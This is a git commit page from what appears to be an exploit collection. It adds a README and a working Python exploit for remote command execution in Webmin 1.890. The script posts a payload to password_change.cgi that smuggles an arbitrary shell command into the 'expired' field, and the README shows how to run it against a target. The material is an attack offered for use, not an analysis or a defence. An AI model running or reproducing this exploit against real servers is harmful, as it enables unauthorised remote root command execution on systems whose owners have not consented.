add Webmin 1.890 RCE
This commit is contained in:
helloexp
parent
0fc7f155d7
commit
2a5a985da9
11
CMS/Webmin/README.md
Normal file
11
CMS/Webmin/README.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
# Webmin 1.890 RCE
|
||||||
|
|
||||||
|
## 供应链攻击的典型案例,值得收录
|
||||||
|
|
||||||
|
### exp 使用
|
||||||
|
```shell
|
||||||
|
python3 exploit.py http://10.0.0.1:10000 id
|
||||||
|
```
|
||||||
|
|
||||||
|
服务器返回结果如下:
|
||||||
|
|
||||||
30
CMS/Webmin/exploit.py
Normal file
30
CMS/Webmin/exploit.py
Normal file
@ -0,0 +1,30 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
STAIN = """
|
||||||
|
WebMin 1.890-expired-remote-root
|
||||||
|
"""
|
||||||
|
usage = """Usage: python3 exploit.py target COMMAND
|
||||||
|
|
||||||
|
Ex: python3 exploit.py http://10.0.0.1:10000 id
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
def exploit(target, url, command):
|
||||||
|
header = 'Referer: {}/session_login.cgi'.format(target)
|
||||||
|
payload = 'user=gotroot&pam=&expired=2|echo "";{}'.format(command)
|
||||||
|
os.system("curl -k {} -d '{}' -H '{}'".format(url,payload,header))
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
try:
|
||||||
|
print(STAIN)
|
||||||
|
target = sys.argv[1].rstrip("/")
|
||||||
|
url = target+"/password_change.cgi"
|
||||||
|
command = sys.argv[2]
|
||||||
|
exploit(target, url, command)
|
||||||
|
except:
|
||||||
|
print(STAIN)
|
||||||
|
print(usage)
|
||||||
BIN
CMS/Webmin/images/服务器返回内容.png
Normal file
BIN
CMS/Webmin/images/服务器返回内容.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 14 KiB |
Loading…
x
Reference in New Issue
Block a user